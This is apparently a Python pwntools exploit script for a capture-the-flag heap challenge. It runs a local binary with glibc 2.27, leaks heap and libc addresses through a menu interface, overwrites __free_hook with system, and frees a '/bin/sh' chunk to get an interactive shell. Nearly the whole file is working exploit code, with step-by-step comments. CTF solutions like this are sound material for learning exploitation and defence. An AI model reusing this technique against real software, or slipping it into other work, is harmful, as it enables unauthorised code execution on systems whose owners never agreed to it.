import glob
import os
import random
import signal
import struct
import sys
import time

from pwn import *
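# Optional suffix for the helper files written under /tmp, so several runs can
# coexist.  An unset or empty GDB_SALT collapses to '' (single getenv lookup;
# the original queried the environment twice).
salt = os.getenv('GDB_SALT') or ''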
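def clear(signum=None, stack=None):
    """Delete the helper files this script created under /tmp, then exit.

    Installed as the handler for SIGINT/SIGHUP/SIGTERM and also invoked at the
    end of a normal run, so both parameters are optional and unused.

    Args:
        signum: Signal number passed by the signal machinery (ignored).
        stack: Current stack frame passed by the signal machinery (ignored).

    Raises:
        SystemExit: always, with status 0.
    """
    print('Strip all debugging information')
    # Expand the patterns in-process and unlink matches directly rather than
    # interpolating ``salt`` into an ``rm -f`` string for os.system(): ``salt``
    # comes from the GDB_SALT environment variable, and a value containing
    # shell metacharacters would otherwise be executed by the shell.
    # glob.escape keeps ``salt`` literal so it cannot widen the match.
    for prefix in ('/tmp/gdb_symbols', '/tmp/gdb_pid', '/tmp/gdb_script'):
        for path in glob.glob(prefix + glob.escape(salt) + '*'):
            try:
                os.remove(path)
            except OSError:
                # mirror ``rm -f``: a vanished or unremovable entry is not fatal
                pass
    # sys.exit rather than the site-provided exit(): identical SystemExit(0),
    # but does not depend on site.py having installed the helper.
    sys.exit(0)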
# Tear down the /tmp helper files whenever the run is interrupted (Ctrl-C),
# the controlling terminal disappears, or the process is asked to terminate.
for sig in (signal.SIGINT, signal.SIGHUP, signal.SIGTERM):
    signal.signal(sig, clear)
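# Write the gdb_symbols C snippet (currently just a blank) to
# /tmp/gdb_symbols<salt>.c -- presumably consumed by an external gdb helper
# that is not part of this file.  Best effort: a failure is printed and the
# run continues.
# NOTE(review): the path is predictable and /tmp is shared with other local
# users, so the file could be pre-created by someone else; tolerable for a
# throwaway CTF helper.
try:
    gdb_symbols = ''' '''
    # 'with' closes the handle even when write() raises; the original only
    # closed it on the success path.
    with open('/tmp/gdb_symbols{}.c'.replace('{}', salt), 'w') as f:
        f.write(gdb_symbols)
except Exception as e:
    print(e)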
# Tell pwntools the target is x86-64 (sets the default word size/endianness
# used by the packing helpers and the process wrappers below).
context.arch = 'amd64'
execve_file = './source'
# Spawn the challenge binary locally, then load it and the bundled libc so
# that libc.symbols[...] can be resolved later in the script.
sh = process(execve_file)
elf, libc = ELF(execve_file), ELF('./libc-2.27.so')
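# Record the spawned target's PID and the (currently empty) gdb script under
# /tmp -- presumably for an external debugger helper that is not shown here.
# Best effort: any failure is printed and the run continues.
try:
    gdbscript = ''' '''
    # 'with' guarantees both handles are closed even when write() raises
    with open('/tmp/gdb_pid{}'.replace('{}', salt), 'w') as f:
        f.write(str(proc.pidof(sh)[0]))
    with open('/tmp/gdb_script{}'.replace('{}', salt), 'w') as f:
        f.write(gdbscript)
except Exception as e:
    print(e)


def malloc(size, content):
    """Drive menu command 1 of the target: allocate ``size`` bytes holding ``content``.

    Each field is sent after its prompt.  The command and size fields are
    NUL-padded to 4 bytes; ``content`` is sent exactly as given.

    Args:
        size: Allocation size requested from the target.
        content: Data written into the new chunk (str or packed bytes).
    """
    sh.sendafter('which command?\n> ', '1'.ljust(4, '\0'))
    sh.sendafter('size \n> ', str(size).ljust(4, '\0'))
    sh.sendafter('content \n> ', content)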
def free(index):
    """Drive menu command 2 of the target: release the chunk in slot ``index``.

    Args:
        index: Slot number of the chunk to free; sent NUL-padded to 4 bytes.
    """
    command = '2'.ljust(4, '\0')
    slot = str(index).ljust(4, '\0')
    sh.sendafter('which command?\n> ', command)
    sh.sendafter('index \n> ', slot)
def puts(index):
    """Drive menu command 3 of the target: print the chunk in slot ``index``.

    The reply line is not consumed here; callers read it with sh.recvline().

    Args:
        index: Slot number of the chunk to print; sent NUL-padded to 4 bytes.
    """
    command = '3'.ljust(4, '\0')
    slot = str(index).ljust(4, '\0')
    sh.sendafter('which command?\n> ', command)
    sh.sendafter('index \n> ', slot)
# ---- Phase 1: shape the heap, then read slot 9 back ----
# Ten 0xf0-byte allocations in slots 0..9, each containing a single newline.
for i in range(10):
    malloc(0xf0, '\n')
# Release slots 0..8, then slot 9 separately.
for i in range(9):
    free(i)
free(9)
# Re-fill all ten slots with 0xf0-byte chunks.
for i in range(10):
    malloc(0xf0, '\n')
# Release slots 0..6, then 7; take one more 0xf0 chunk; then release 8.
for i in range(7):
    free(i)
free(7)
malloc(0xf0, '\n')
free(8)
# One 0xf8-byte allocation, then release slots 0 and 9.
malloc(0xf8, '\n')
free(0)
free(9)
# Nine 0xf0-byte allocations whose content is the string "/bin/sh\0".
for i in range(9):
    malloc(0xf0, '/bin/sh\0')
free(0)
free(1)
# Ask the target to print slot 9; the reply is consumed below as a heap leak.
puts(9)
# Read the line printed for slot 9 (dropping its trailing newline), NUL-pad it
# to 8 bytes and unpack with u64; the fixed 0x310 is subtracted to obtain the
# heap reference (heap_addr) that later pointer values are built from.
result = sh.recvline()[:-1]
heap_addr = u64(result.ljust(8, '\0')) - 0x310
log.success('heap_addr: ' + hex(heap_addr))
# ---- Phase 2: place heap-derived pointers, then read slot 0 back ----
malloc(0xf0, '\0')
free(2)
free(3)
free(4)
free(5)
free(0)
free(9)
# Chunk contents are now packed values derived from the heap leak above:
# heap_addr + 0x260 as a full qword, a zero qword, then the first 7 bytes of
# packed heap_addr + 0xa18 placed in an 8-byte allocation.
malloc(0xf0, p64(heap_addr + 0x260))
malloc(0xf0, p64(0))
malloc(0x8, p64(heap_addr + 0xa18)[:7])
# Ask the target to print slot 0; the reply is consumed below as a libc leak.
puts(0)
# Read the line printed for slot 0, NUL-pad to 8 bytes and unpack with u64;
# the script subtracts 96 to obtain the address it labels main_arena.
result = sh.recvline()[:-1]
main_arena_addr = u64(result.ljust(8, '\0')) - 96
log.success('main_arena_addr: ' + hex(main_arena_addr))
# libc base, computed on the assumption that main_arena sits 0x10 past
# __malloc_hook; the 0x10 is hard-coded for the bundled libc-2.27.so.
libc_addr = main_arena_addr - (libc.symbols['__malloc_hook'] + 0x10)
log.success('libc_addr: ' + hex(libc_addr))
# ---- Phase 3: repeat the pointer placement, then place libc addresses ----
free(1)
malloc(0xf0, p64(heap_addr + 0x260))
malloc(0xf0, p64(0))
malloc(0x8, p64(heap_addr + 0xa10)[:7])
free(1)
free(3)
# The 8-byte allocations now carry libc addresses computed from the leak:
# __free_hook's address first, then system's (each truncated to 7 bytes).
malloc(0x8, p64(libc_addr + libc.symbols['__free_hook'])[:7])
malloc(0xf0, '\0')
malloc(0x8, p64(libc_addr + libc.symbols['system'])[:7])
# Release slot 0, then hand the target's I/O over to the user.
free(0)
sh.interactive()
# Normal exit path: remove the /tmp helper files and exit with status 0.
clear()